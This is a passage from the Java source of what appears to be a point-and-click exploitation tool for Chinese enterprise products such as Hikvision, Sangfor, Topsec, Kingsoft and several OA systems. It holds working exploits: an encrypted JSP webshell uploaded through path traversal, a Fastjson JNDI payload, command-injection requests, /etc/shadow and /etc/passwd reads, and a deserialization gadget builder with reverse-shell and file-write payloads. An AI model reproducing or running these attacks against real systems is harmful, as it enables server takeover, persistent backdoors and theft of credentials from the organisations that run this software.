"------WebKitFormBoundary9PggsiM755PLa54a--"; 23 | switch (type){ 24 | case POC: 25 | data =data.replace("filename",randomStr); 26 | HttpRequest httpRequest = new HttpRequest(target+url); 27 | httpRequest.addHeaders("Content-Type","multipart/form-data; boundary=----WebKitFormBoundary9PggsiM755PLa54a"); 28 | Response result = httpRequest.Post(data); 29 | if (result.statusCode==200 && result.responseBody.contains(randomStr)){ 30 | WriteLog("\n[*] 存在漏洞"); 31 | WriteLog("\n[*] 访问地址:"+target+"/lm/"+randomStr+";.css"); 32 | }else { 33 | WriteLog("\n[*] 不存在漏洞"); 34 | } 35 | case EXP: 36 | String payload = "<%@page import=\"java.util.*,javax.crypto.*,javax.crypto.spec.*\"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals(\"POST\")){String k=\"e45e329feb5d925b\";session.putValue(\"u\",k);Cipher c=Cipher.getInstance(\"AES\");c.init(2,new SecretKeySpec(k.getBytes(),\"AES\"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>"; 37 | data =data.replace("filename",randomStr); 38 | data =data.replace("Yep!",payload); 39 | HttpRequest httpRequest1 = new HttpRequest(target+url); 40 | httpRequest1.addHeaders("Content-Type","multipart/form-data; boundary=----WebKitFormBoundary9PggsiM755PLa54a"); 41 | Response result1 = httpRequest1.Post(data); 42 | if (result1.statusCode==200 && result1.responseBody.contains(randomStr)){ 43 | WriteLog("\n[*] 存在漏洞"); 44 | WriteLog("\n[*] 访问地址:"+target+"/lm/"+randomStr+";.css"); 45 | WriteLog("\n[*] 默认连接密码rebeyond"); 46 | }else { 47 | WriteLog("\n[*] 不存在漏洞"); 48 | } 49 | } 50 | } 51 | 52 | @VulnerabilityDescriptionMapping(Description = "海康威视综合安防 lm 文件读取漏洞",SupportVulType = SupportVul.信息泄露) 53 | public void vul_lm_Readfile(Poc_Exp type, String target, Object... args) throws MalformedURLException { 54 | WriteLog("\n[*]开始检测: 海康威视综合安防 lm 文件读取漏洞"); 55 | String url = "/lm/api/files;.css?link=/etc/passwd"; 56 | switch (type){ 57 | case POC: 58 | HttpRequest httpRequest = new HttpRequest(target+url); 59 | Response result = httpRequest.Get(""); 60 | if (result.statusCode==200 && result.responseBody.contains("root")){ 61 | WriteLog("\n[*] 存在漏洞"); 62 | WriteLog("\n[*] 访问地址:"+target+"/lm/api/files;.css?link=/etc/passwd"); 63 | }else { 64 | WriteLog("\n[*] 不存在漏洞"); 65 | } 66 | case EXP: 67 | break; 68 | } 69 | } 70 | 71 | @VulnerabilityDescriptionMapping(Description = "海康威视综合安防 center 文件上传漏洞",SupportVulType = SupportVul.UploadFile) 72 | public void vul_center(Poc_Exp type, String target, Object... args) throws MalformedURLException { 73 | WriteLog("\n[*]开始检测: 海康威视综合安防 center 文件上传漏洞"); 74 | String randomStr = Utils.getRandomString(4)+".jsp"; 75 | String url = "/center/api/files;.html"; 76 | String data = "------WebKitFormBoundary9PggsiM755PLa54a\n" + 77 | "Content-Disposition: form-data; name=\"file\"; filename=\"../../../../../../../../../../../opt/hikvision/web/components/tomcat85linux64.1/webapps/eportal/filename\"\n" + 78 | "Content-Type: application/zip\n" + 79 | "\n" + 80 | "Yep!\n" + 81 | "------WebKitFormBoundary9PggsiM755PLa54a--"; 82 | switch (type){ 83 | case POC: 84 | data =data.replace("filename",randomStr); 85 | HttpRequest httpRequest = new HttpRequest(target+url); 86 | httpRequest.addHeaders("Content-Type","multipart/form-data; boundary=----WebKitFormBoundary9PggsiM755PLa54a"); 87 | Response result = httpRequest.Post(data); 88 | if (result.statusCode==200 && result.responseBody.contains("Yep!")){ 89 | WriteLog("\n[*] 存在漏洞"); 90 | WriteLog("\n[*] 访问地址:"+target+"/portal/ui/login/..;/..;/"+randomStr); 91 | }else { 92 | WriteLog("\n[*] 不存在漏洞"); 93 | } 94 | case EXP: 95 | break; 96 | } 97 | } 98 | 99 | @VulnerabilityDescriptionMapping(Description = "海康威视综合安防 report 文件上传漏洞",SupportVulType = SupportVul.UploadFile) 100 | public void vul_report(Poc_Exp type, String target, Object... args) throws MalformedURLException { 101 | WriteLog("\n[*]开始检测: 海康威视综合安防 report 文件上传漏洞"); 102 | String randomStr = Utils.getRandomString(4)+".jsp"; 103 | String url = "/svm/api/external/report"; 104 | String data = "------WebKitFormBoundary9PggsiM755PLa54a\n" + 105 | "Content-Disposition: form-data; name=\"file\"; filename=\"../../../../../../../../../../../opt/hikvision/web/components/tomcat85linux64.1/webapps/eportal/filename\"\n" + 106 | "Content-Type: application/zip\n" + 107 | "\n" + 108 | "Yep!\n" + 109 | "------WebKitFormBoundary9PggsiM755PLa54a--"; 110 | switch (type){ 111 | case POC: 112 | data =data.replace("filename",randomStr); 113 | HttpRequest httpRequest = new HttpRequest(target+url); 114 | httpRequest.addHeaders("Content-Type","multipart/form-data; boundary=----WebKitFormBoundary9PggsiM755PLa54a"); 115 | Response result = httpRequest.Post(data); 116 | if (result.statusCode==200 && result.responseBody.contains("Yep!")){ 117 | WriteLog("\n[*] 存在漏洞"); 118 | WriteLog("\n[*] 访问地址:"+target+"/portal/ui/login/..;/..;/"+randomStr); 119 | }else { 120 | WriteLog("\n[*] 不存在漏洞"); 121 | } 122 | case EXP: 123 | break; 124 | } 125 | } 126 | 127 | @VulnerabilityDescriptionMapping(Description = "海康威视综合安防 iVMS-8700 Fsatjson 漏洞",SupportVulType = SupportVul.Jndi) 128 | public void vul_Fsatjson_Jndi(Poc_Exp type, String target, Object... args) throws Exception { 129 | WriteLog("\n[*]开始检测: 海康威视综合安防 iVMS-8700 Fsatjson 漏洞"); 130 | String url = "/bic/ssoService/v1/applyCT"; 131 | String data = "{\"a\":{\"@type\":\"java.lang.Class\",\"val\":\"com.sun.rowset.JdbcRowSetImpl\"},\"b\":{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\"dataSourceName\":\"ldap://dnslog\",\"autoCommit\":true},\"hfe4zyyzldp\":\"=\"}"; 132 | switch (type){ 133 | case POC: 134 | if (Cache.uiController.DNSDomain.getText().equals("")){ 135 | WriteLog("\n[*] DNS验证类型漏洞 请配置 DNSLOG 地址"); 136 | return; 137 | }else { 138 | DNSLOG.setDomain(Cache.uiController.DNSDomain.getText()); 139 | } 140 | String domain = DNSLOG.getRandomDomain(); 141 | data = data.replace("dnslog",domain); 142 | HttpRequest httpRequest = new HttpRequest(target+url); 143 | httpRequest.addHeaders("Content-Type","application/json"); 144 | httpRequest.Post(data); 145 | WriteLog("\n[*] 请自行判断是否成功。"+domain); 146 | WriteLog("\n[*] 漏洞详情:https://mp.weixin.qq.com/s/CEGjTyhphr2GMuK9zpl5bg"); 147 | case EXP: 148 | break; 149 | } 150 | } 151 | 152 | } 153 | -------------------------------------------------------------------------------- /src/main/java/com/achuna33/Controllers/HuaTianController.java: -------------------------------------------------------------------------------- 1 | package com.achuna33.Controllers; 2 | 3 | import com.achuna33.SupportType.Poc_Exp; 4 | import com.achuna33.SupportType.SupportVul; 5 | import com.achuna33.Utils.Cache; 6 | import com.achuna33.Utils.HttpRequest; 7 | import com.achuna33.Utils.Response; 8 | 9 | @BasicMapping(uri = "华天动力OA") 10 | public class HuaTianController extends Controller implements BasicController{ 11 | @VulnerabilityDescriptionMapping(Description="华天动力OA 8000版 workFlowService SQL注入漏洞" ,SupportVulType= SupportVul.SQLInjection) 12 | public void vul_Getfile(Poc_Exp type, String target, Object... args) throws Exception { 13 | WriteLog("\n开始检测: 华天动力OA 8000版 workFlowService SQL注入漏洞"); 14 | 15 | switch (type){ 16 | case EXP: 17 | break; 18 | case POC: 19 | String data = " \n" + 20 | "getDataListForTree \n" + 21 | "select 'flag'; \n" + 22 | ""; 23 | HttpRequest httpRequest = new HttpRequest(target+"/OAapp/bfapp/buffalo/workFlowService"); 24 | httpRequest.addHeaders("Content-type"," "); 25 | Response result = httpRequest.Post(data); 26 | if(result.responseBody.contains("flag")&&result.statusCode==200){ 27 | WriteLog(" 存在漏洞"); 28 | WriteLog(result.responseBody); 29 | }else { 30 | WriteLog(" 不存在漏洞"); 31 | } 32 | WriteLog("\n"+result.responseBody); 33 | } 34 | } 35 | 36 | } 37 | -------------------------------------------------------------------------------- /src/main/java/com/achuna33/Controllers/JhSoftController.java: -------------------------------------------------------------------------------- 1 | package com.achuna33.Controllers; 2 | 3 | import com.achuna33.SupportType.Poc_Exp; 4 | import com.achuna33.SupportType.SupportVul; 5 | import com.achuna33.Utils.Cache; 6 | import com.achuna33.Utils.HttpRequest; 7 | import com.achuna33.Utils.Response; 8 | 9 | import java.net.MalformedURLException; 10 | 11 | @BasicMapping(uri="金和OA") 12 | public class JhSoftController extends Controller implements BasicController{ 13 | public JhSoftController(){} 14 | 15 | @VulnerabilityDescriptionMapping(Description = "金和OA C6 download.jsp 任意文件读取漏洞",SupportVulType = SupportVul.信息泄露) 16 | public void vul_DownLoadFile(Poc_Exp type, String target,Object... args) throws MalformedURLException { 17 | WriteLog("\n开始检测: vul_DownLoadFile"); 18 | 19 | switch (type){ 20 | case EXP: 21 | break; 22 | case POC: 23 | HttpRequest httpRequest = new HttpRequest(target+"/C6/Jhsoft.Web.module/testbill/dj/download.asp?filename=/c6/web.config"); 24 | String data = ""; 25 | Response result = httpRequest.Get(data); 26 | if(result.responseBody.contains("password") && result.statusCode==200){ 27 | WriteLog(" 存在漏洞"); 28 | }else { 29 | WriteLog(" 不存在漏洞"); 30 | } 31 | WriteLog("\n"+result.responseBody); 32 | } 33 | } 34 | } 35 | -------------------------------------------------------------------------------- /src/main/java/com/achuna33/Controllers/JinShanController.java: -------------------------------------------------------------------------------- 1 | package com.achuna33.Controllers; 2 | 3 | import com.achuna33.SupportType.Poc_Exp; 4 | import com.achuna33.SupportType.SupportVul; 5 | import com.achuna33.Utils.Cache; 6 | import com.achuna33.Utils.HttpRequest; 7 | import com.achuna33.Utils.Response; 8 | 9 | @BasicMapping(uri = "金山V8") 10 | public class JinShanController extends Controller implements BasicController{ 11 | @VulnerabilityDescriptionMapping(Description="金山 V8 终端安全系统 pdf_maker.php 命令执行漏洞" ,SupportVulType= SupportVul.RuntimeExec) 12 | public void vul_pdf_maker(Poc_Exp type, String target, Object... args) throws Exception { 13 | WriteLog("\n[*]开始检测: 金山 V8 终端安全系统 pdf_maker.php 命令执行漏洞"); 14 | 15 | switch (type){ 16 | case EXP: 17 | break; 18 | case POC: 19 | String data = "url=IiB8fCBpcGNvbmZpZyB8fA%3D%3D&fileName=xxx"; 20 | HttpRequest httpRequest = new HttpRequest(target+"/inter/pdf_maker.php"); 21 | Response result = httpRequest.Post(data); 22 | if(result.responseBody.contains("Windows")&&result.statusCode==200){ 23 | WriteLog(" 存在漏洞"); 24 | WriteLog(result.responseBody); 25 | }else { 26 | WriteLog(" 不存在漏洞"); 27 | } 28 | } 29 | } 30 | @VulnerabilityDescriptionMapping(Description="金山 V8 终端安全系统 downfile.php 任意文件读取漏洞" ,SupportVulType= SupportVul.信息泄露) 31 | public void vul_downfile(Poc_Exp type, String target, Object... args) throws Exception { 32 | WriteLog("\n[*]开始检测: 金山 V8 终端安全系统 downfile.php 任意文件读取漏洞"); 33 | 34 | switch (type){ 35 | case EXP: 36 | break; 37 | case POC: 38 | HttpRequest httpRequest = new HttpRequest(target+"/htmltopdf/downfile.php?filename=downfile.php"); 39 | Response result = httpRequest.Get(""); 40 | if(result.responseBody.contains("/var/www/html/cmd.txt\"]}],\"type\":\"rpc\",\"tid\":17,\"f8839p7rqtj\":\"=\"}"; 15 | switch (type){ 16 | case EXP: 17 | break; 18 | case POC: 19 | new HttpRequest(target+"/directdata/direct/router").Post(data); 20 | Response result = new HttpRequest(target+"/cmd.txt").Get(""); 21 | if(result.responseBody.length()>0&&result.statusCode==200){ 22 | WriteLog("\n[*] 存在漏洞"); 23 | WriteLog("访问:"+target +"/cmd.txt"); 24 | }else { 25 | WriteLog("\n[*] 不存在漏洞"); 26 | } 27 | } 28 | } 29 | } 30 | -------------------------------------------------------------------------------- /src/main/java/com/achuna33/Controllers/SangForController.java: -------------------------------------------------------------------------------- 1 | package com.achuna33.Controllers; 2 | 3 | import com.achuna33.SupportType.Poc_Exp; 4 | import com.achuna33.SupportType.SupportVul; 5 | import com.achuna33.Utils.Cache; 6 | import com.achuna33.Utils.HttpRequest; 7 | import com.achuna33.Utils.Response; 8 | 9 | import java.net.MalformedURLException; 10 | 11 | @BasicMapping(uri = "深信服") 12 | public class SangForController extends Controller implements BasicController{ 13 | @VulnerabilityDescriptionMapping(Description = "深信服 应用交付管理系统 sys_user.conf 账号密码泄漏漏洞",SupportVulType = SupportVul.信息泄露) 14 | public void vul_sys_user信息泄露(Poc_Exp type, String target, Object... args) throws MalformedURLException { 15 | WriteLog("\n[*]开始检测: 深信服 应用交付管理系统 sys_user.conf 账号密码泄漏漏洞"); 16 | 17 | 18 | switch (type){ 19 | case EXP: 20 | break; 21 | case POC: 22 | HttpRequest httpRequest = new HttpRequest(target+"/tmp/updateme/sinfor/ad/sys/sys_user.conf"); 23 | Response result = httpRequest.Get(""); 24 | if((result.responseBody.contains("true") || result.responseBody.contains("admin"))&&result.statusCode==200){ 25 | WriteLog("\n[*] 存在漏洞"); 26 | WriteLog("\n[*]"+result.responseBody); 27 | }else { 28 | WriteLog("\n[*] 不存在漏洞"); 29 | } 30 | } 31 | 32 | } 33 | @VulnerabilityDescriptionMapping(Description = "深信服 应用交付报表系统 download.php 任意文件读取漏洞",SupportVulType = SupportVul.信息泄露) 34 | public void vul_download_文件读取(Poc_Exp type, String target, Object... args) throws MalformedURLException { 35 | WriteLog("\n[*]开始检测: 深信服 应用交付报表系统 download.php 任意文件读取漏洞"); 36 | 37 | 38 | switch (type){ 39 | case EXP: 40 | break; 41 | case POC: 42 | HttpRequest httpRequest = new HttpRequest(target+"/report/download.php?pdf=../../../../../etc/passwd"); 43 | Response result = httpRequest.Get(""); 44 | if(result.responseBody.contains("root")&&result.statusCode==200){ 45 | WriteLog("\n[*] 存在漏洞"); 46 | WriteLog("\n[*]"+result.responseBody); 47 | }else { 48 | WriteLog("\n[*] 不存在漏洞"); 49 | } 50 | } 51 | } 52 | 53 | @VulnerabilityDescriptionMapping(Description = "深信服 行为感知系统/日志中心 c.php 远程命令执行漏洞",SupportVulType = SupportVul.RuntimeExec) 54 | public void vul_c_命令执行(Poc_Exp type, String target, Object... args) throws MalformedURLException { 55 | WriteLog("\n[*]开始检测: 深信服 行为感知系统/日志中心 c.php 远程命令执行漏洞"); 56 | 57 | 58 | switch (type){ 59 | case EXP: 60 | break; 61 | case POC: 62 | HttpRequest httpRequest = new HttpRequest(target+"/tool/log/c.php?strip_slashes=system&host=echo%20flag"); 63 | Response result = httpRequest.Get(""); 64 | if(result.responseBody.contains("flag")&&result.statusCode==200){ 65 | WriteLog("\n[*] 存在漏洞"); 66 | WriteLog("\n[*]请求地址:"+target+"/tool/log/c.php?strip_slashes=system&host=echo%20flag"); 67 | WriteLog("\n"+result.responseBody); 68 | }else { 69 | WriteLog("\n[*] 不存在漏洞"); 70 | } 71 | } 72 | } 73 | // @VulnerabilityDescriptionMapping(Description = "深信服 终端检测检测平台 ui/login.php 任意用户登录漏洞",SupportVulType = SupportVul.信息泄露) 74 | // public void vul_loginBypass(Poc_Exp type, String target, Object... args) throws MalformedURLException { 75 | // Cache.uiController.logTextArea.appendText("\n[*]开始检测: 深信服 终端检测检测平台 ui/login.php 任意用户登录漏洞"); 76 | // 77 | // switch (type){ 78 | // case EXP: 79 | // break; 80 | // case POC: 81 | // HttpRequest httpRequest = new HttpRequest(target+"/ui/login.php?User=admin"); 82 | // Response result = httpRequest.Get(""); 83 | // if(result.statusCode==200){ 84 | // WriteLog("\n[*] 存在漏洞"); 85 | // WriteLog("\n[*] 请求地址:"+target+"/ui/login.php?user=admin"); 86 | // }else { 87 | // WriteLog("\n[*] 不存在漏洞"); 88 | // } 89 | // } 90 | // } 91 | 92 | 93 | } 94 | -------------------------------------------------------------------------------- /src/main/java/com/achuna33/Controllers/SerializedDataController.java: -------------------------------------------------------------------------------- 1 | package com.achuna33.Controllers; 2 | 3 | 4 | import com.achuna33.Exceptions.IncorrectParamsException; 5 | import com.achuna33.Exceptions.UnSupportedGadgetTypeException; 6 | import com.achuna33.Exceptions.UnSupportedPayloadTypeException; 7 | import com.achuna33.Gadgets.*; 8 | import com.achuna33.SupportType.GadgetType; 9 | import com.achuna33.SupportType.PayloadType; 10 | 11 | import com.achuna33.Utils.Cache; 12 | import com.achuna33.Utils.Utils; 13 | 14 | public class SerializedDataController { 15 | private GadgetType gadgetType; 16 | private PayloadType payloadType; 17 | private String[] params; 18 | 19 | 20 | public byte[] getResult(String base) throws Exception { 21 | System.out.println("[+] Start create javaSerializedData :" + base + " with javaSerializedData attribute"); 22 | Cache.uiController.PublicArea.appendText("\n[+] Start create javaSerializedData :" + base + " with javaSerializedData attribute"); 23 | 24 | //这个方法里面有改动,其他基本无改动 25 | byte[] bytes = null; 26 | Object obj = null; 27 | switch (gadgetType){ 28 | case urldns: 29 | bytes = URLDNS.getBytes(params[0]); 30 | break; 31 | case commonsbeanutils1: 32 | bytes = CommonsBeanutils1.getBytes(payloadType, params); 33 | break; 34 | case commonsbeanutils2: 35 | bytes = CommonsBeanutils2.getBytes(payloadType, params); 36 | break; 37 | case commonscollectionsk1: 38 | bytes = CommonsCollectionsK1.getBytes(payloadType, params); 39 | break; 40 | case commonscollectionsk2: 41 | bytes = CommonsCollectionsK2.getBytes(payloadType, params); 42 | break; 43 | case jdk7u21: 44 | bytes = Jdk7u21.getBytes(payloadType, params); 45 | break; 46 | case jre8u20: 47 | bytes = Jre8u20.getBytes(payloadType, params); 48 | break; 49 | case c3p0: 50 | bytes = C3P0.getBytes(payloadType, params); 51 | break; 52 | } 53 | return bytes; 54 | } 55 | 56 | 57 | public void process(String base) throws UnSupportedPayloadTypeException, IncorrectParamsException, UnSupportedGadgetTypeException { 58 | try{ 59 | int firstIndex = base.indexOf("/"); 60 | int secondIndex = base.indexOf("/", firstIndex + 1); 61 | try{ 62 | gadgetType = GadgetType.valueOf(base.substring(firstIndex + 1, secondIndex).toLowerCase()); 63 | System.out.println("[+] GaddgetType: " + gadgetType); 64 | Cache.uiController.PublicArea.appendText("\n[+] GaddgetType: " + gadgetType); 65 | }catch(IllegalArgumentException e){ 66 | throw new UnSupportedGadgetTypeException("UnSupportGaddgetType: " + base.substring(firstIndex + 1, secondIndex)); 67 | } 68 | 69 | if(gadgetType == GadgetType.urldns){ 70 | String url = "http://" + base.substring(base.lastIndexOf("/") + 1); 71 | System.out.println("[+] URL: " + url); 72 | Cache.uiController.PublicArea.appendText("\n[+] URL: " + url); 73 | 74 | params = new String[]{url}; 75 | return; 76 | } 77 | 78 | int thirdIndex = base.indexOf("/", secondIndex + 1); 79 | if(thirdIndex < 0) thirdIndex = base.length(); 80 | try{ 81 | payloadType = PayloadType.valueOf(base.substring(secondIndex + 1, thirdIndex).toLowerCase()); 82 | System.out.println("[+] PayloadType: " + payloadType); 83 | Cache.uiController.PublicArea.appendText("\n[+] PayloadType: " + payloadType); 84 | 85 | }catch (IllegalArgumentException e){ 86 | throw new UnSupportedPayloadTypeException("UnSupportedPayloadType: " + base.substring(secondIndex + 1, thirdIndex)); 87 | } 88 | 89 | switch(payloadType){ 90 | case dnslog: 91 | String url = base.substring(base.lastIndexOf("/") + 1); 92 | System.out.println("[+] URL: " + url); 93 | Cache.uiController.PublicArea.appendText("\n[+] URL: " + url); 94 | 95 | params = new String[]{url}; 96 | break; 97 | case command: 98 | String cmd = Utils.getCmdFromBase(base); 99 | System.out.println("[+] Command: " + cmd); 100 | Cache.uiController.PublicArea.appendText("\n[+] Command: " + cmd); 101 | 102 | params = new String[]{cmd}; 103 | break; 104 | case reverseshell: 105 | String[] results = Utils.getIPAndPortFromBase(base); 106 | System.out.println("[+] IP: " + results[0]); 107 | System.out.println("[+] Port: " + results[1]); 108 | Cache.uiController.PublicArea.appendText("\n[+] IP: " + results[0]); 109 | Cache.uiController.PublicArea.appendText("\n[+] Port: " + results[1]); 110 | 111 | params = results; 112 | break; 113 | case putfile: 114 | //文件中‘/’ 用 _] 替换 ‘+’用 115 | String[] result = Utils.getPathAndContent(base); 116 | System.out.println("[+] Path:" + result[0]); 117 | System.out.println("[+] Content:" + result[1]); 118 | Cache.uiController.PublicArea.appendText("\n[+] Path:" + result[0]); 119 | Cache.uiController.PublicArea.appendText("\n[+] Content:" + result[1]); 120 | params = result; 121 | break; 122 | case commandecho: 123 | //文件中‘/’ 用 _] 替换 ‘+’用 124 | String[] commandechoResult = Utils.getcommandechoArgs(base); 125 | System.out.println("[+] uri:" + commandechoResult[0]); 126 | System.out.println("[+] cmd:" + commandechoResult[1]); 127 | Cache.uiController.PublicArea.appendText("\n[+] uri:" + commandechoResult[0]); 128 | Cache.uiController.PublicArea.appendText("\n[+] cmd:" + commandechoResult[1]); 129 | 130 | params = commandechoResult; 131 | break; 132 | } 133 | 134 | }catch(Exception e){ 135 | if(e instanceof UnSupportedPayloadTypeException) throw (UnSupportedPayloadTypeException)e; 136 | if(e instanceof UnSupportedGadgetTypeException) throw (UnSupportedGadgetTypeException)e; 137 | 138 | throw new IncorrectParamsException("Incorrect params: " + base); 139 | } 140 | } 141 | } 142 | -------------------------------------------------------------------------------- /src/main/java/com/achuna33/Controllers/TRXController.java: -------------------------------------------------------------------------------- 1 | package com.achuna33.Controllers; 2 | 3 | import com.achuna33.SupportType.Poc_Exp; 4 | import com.achuna33.SupportType.SupportVul; 5 | import com.achuna33.Utils.Cache; 6 | import com.achuna33.Utils.HttpRequest; 7 | import com.achuna33.Utils.Response; 8 | 9 | import java.net.MalformedURLException; 10 | 11 | @BasicMapping(uri = "天融信") 12 | public class TRXController extends Controller implements BasicController{ 13 | @VulnerabilityDescriptionMapping(Description = "天融信 上网行为管理系统 static_convert.php 远程命令执行漏洞",SupportVulType = SupportVul.RuntimeExec) 14 | public void vul_c_命令执行(Poc_Exp type, String target, Object... args) throws MalformedURLException { 15 | WriteLog("\n开始检测: vul_c_命令执行"); 16 | 17 | 18 | switch (type){ 19 | case EXP: 20 | break; 21 | case POC: 22 | HttpRequest httpRequest = new HttpRequest(target+"/view/IPV6/naborTable/static_convert.php?blocks[0]=||%20echo%20%27testasdtest%27%20%3E%3E%20/var/www/html/config_application.txt%0a"); 23 | Response result = httpRequest.Get(""); 24 | HttpRequest httpRequest1 = new HttpRequest(target+"/config_application.txt"); 25 | Response result1 = httpRequest1.Get(""); 26 | 27 | if(result1.responseBody.contains("testasdtest")&&result1.statusCode==200){ 28 | WriteLog("\n 存在漏洞"); 29 | WriteLog("\n请求地址:"+target+"/view/IPV6/naborTable/static_convert.php?blocks[0]=||%20echo%20%27testasdtest%27%20%3E%3E%20/var/www/html/config_application.txt%0a"); 30 | WriteLog("\n"+result1.responseBody); 31 | }else { 32 | WriteLog("\n 不存在漏洞"); 33 | } 34 | } 35 | } 36 | } 37 | -------------------------------------------------------------------------------- /src/main/java/com/achuna33/Controllers/VulnerabilityDescriptionMapping.java: -------------------------------------------------------------------------------- 1 | package com.achuna33.Controllers; 2 | 3 | import com.achuna33.SupportType.SupportVul; 4 | 5 | import java.lang.annotation.ElementType; 6 | import java.lang.annotation.Retention; 7 | import java.lang.annotation.RetentionPolicy; 8 | import java.lang.annotation.Target; 9 | 10 | @Retention(RetentionPolicy.RUNTIME) 11 | @Target(ElementType.METHOD) 12 | public @interface VulnerabilityDescriptionMapping { 13 | String Description(); 14 | SupportVul SupportVulType(); 15 | } 16 | -------------------------------------------------------------------------------- /src/main/java/com/achuna33/Controllers/XYController.java: -------------------------------------------------------------------------------- 1 | 2 | package com.achuna33.Controllers; 3 | 4 | import com.achuna33.SupportType.Poc_Exp; 5 | import com.achuna33.SupportType.SupportVul; 6 | import com.achuna33.Utils.Cache; 7 | import com.achuna33.Utils.HttpRequest; 8 | import com.achuna33.Utils.Response; 9 | 10 | import java.net.MalformedURLException; 11 | 12 | @BasicMapping(uri = "小鱼") 13 | public class XYController extends Controller implements BasicController{ 14 | @VulnerabilityDescriptionMapping(Description = "小鱼互联 任意文件读取",SupportVulType = SupportVul.信息泄露) 15 | public void vul_read(Poc_Exp type, String target, Object... args) throws MalformedURLException { 16 | WriteLog("\n开始检测: vul_read_任意文件读取"); 17 | 18 | 19 | switch (type){ 20 | case EXP: 21 | break; 22 | case POC: 23 | HttpRequest httpRequest = new HttpRequest(target+"/download.action"); 24 | String data = "filename=../../../../../../../../../../../etc/././shadow"; 25 | Response result = httpRequest.Post(data); 26 | 27 | 28 | if(result.responseBody.contains("root")&&result.statusCode==200){ 29 | WriteLog("\n 存在漏洞"); 30 | WriteLog("\n请求地址:"+target+"/download.action\r\n"); 31 | 32 | }else { 33 | WriteLog("\n 不存在漏洞"); 34 | } 35 | } 36 | } 37 | } 38 | -------------------------------------------------------------------------------- /src/main/java/com/achuna33/Controllers/XinDianController.java: -------------------------------------------------------------------------------- 1 | package com.achuna33.Controllers; 2 | 3 | import com.achuna33.SupportType.Poc_Exp; 4 | import com.achuna33.SupportType.SupportVul; 5 | import com.achuna33.Utils.Cache; 6 | import com.achuna33.Utils.HttpRequest; 7 | import com.achuna33.Utils.Response; 8 | 9 | import java.net.MalformedURLException; 10 | 11 | @BasicMapping(uri = "新点OA") 12 | public class XinDianController extends Controller implements BasicController{ 13 | @VulnerabilityDescriptionMapping(Description = "人员列表.xls 信息泄露",SupportVulType = SupportVul.信息泄露) 14 | public void vul_ExcelExport(Poc_Exp type, String target, Object... args) throws MalformedURLException { 15 | 16 | WriteLog("\n[*]开始检测: vul_ExcelExport"); 17 | 18 | switch (type){ 19 | case EXP: 20 | break; 21 | case POC: 22 | HttpRequest httpRequest = new HttpRequest(target+"/ExcelExport/人员列表.xls"); 23 | String data = ""; 24 | Response result = httpRequest.Get(data); 25 | if(result.statusCode==200){ 26 | WriteLog("\n[*] 存在漏洞"); 27 | WriteLog("\n[*] 访问地址:"+target+"/ExcelExport/人员列表.xls" ); 28 | }else { 29 | WriteLog("\n[*] 不存在漏洞"); 30 | } 31 | //WriteLog("\n"+result.responseBody); 32 | } 33 | } 34 | } 35 | -------------------------------------------------------------------------------- /src/main/java/com/achuna33/Controllers/YiSaitongController.java: -------------------------------------------------------------------------------- 1 | package com.achuna33.Controllers; 2 | 3 | import com.achuna33.SupportType.Poc_Exp; 4 | import com.achuna33.SupportType.SupportVul; 5 | import com.achuna33.Utils.Cache; 6 | import com.achuna33.Utils.HttpRequest; 7 | import com.achuna33.Utils.Response; 8 | 9 | import java.io.ByteArrayInputStream; 10 | import java.net.MalformedURLException; 11 | import org.w3c.dom.Document; 12 | import org.w3c.dom.Element; 13 | import org.w3c.dom.Node; 14 | import org.w3c.dom.NodeList; 15 | 16 | import javax.xml.parsers.DocumentBuilder; 17 | import javax.xml.parsers.DocumentBuilderFactory; 18 | 19 | 20 | @BasicMapping(uri = "亿赛通") 21 | public class YiSaitongController extends Controller implements BasicController{ 22 | @VulnerabilityDescriptionMapping(Description = "亿赛通电子文档安全管理系统 UploadFileFromClientServiceForClient 任意文件上传漏洞",SupportVulType = SupportVul.UploadFile) 23 | public void vul_UploadFile(Poc_Exp type, String target, Object... args) throws MalformedURLException { 24 | WriteLog("\n[*] 开始检测: 亿赛通电子文档安全管理系统 UploadFileFromClientServiceForClient 任意文件上传漏洞"); 25 | String url = "/CDGServer3/UploadFileFromClientServiceForClient?AFMALANMJCEOENIBDJMKFHBANGEPKHNOFJBMIFJPFNKFOKHJNMLCOIDDJGNEIPOLOKGAFAFJHDEJPHEPLFJHDGPBNELNFIICGFNGEOEFBKCDDCGJEPIKFHJFAOOHJEPNNCLFHDAFDNCGBAEELJFFHABJPDPIEEMIBOECDMDLEPBJGBGCGLEMBDFAGOGM"; 26 | switch (type){ 27 | case POC: 28 | HttpRequest httpRequest = new HttpRequest(target+url); 29 | Response result = httpRequest.Post("Test"); 30 | if (result.statusCode == 200){ 31 | WriteLog("\n[*] 存在漏洞"); 32 | WriteLog("\n[*] 漏洞链接:"+target+"tttT.jsp"); 33 | }else { 34 | WriteLog("\n[*] 不存在漏洞"); 35 | } 36 | case EXP: 37 | } 38 | } 39 | 40 | @VulnerabilityDescriptionMapping(Description = "亿赛通电子文档安全管理系统 dataimport 命令执行漏洞",SupportVulType = SupportVul.RuntimeExec) 41 | public void vul_dataimport(Poc_Exp type, String target, Object... args) throws MalformedURLException { 42 | WriteLog("\n[*] 开始检测: 亿赛通电子文档安全管理系统 dataimport 命令执行漏洞"); 43 | String command = Cache.uiController.exCommandText.getText(); 44 | String url = 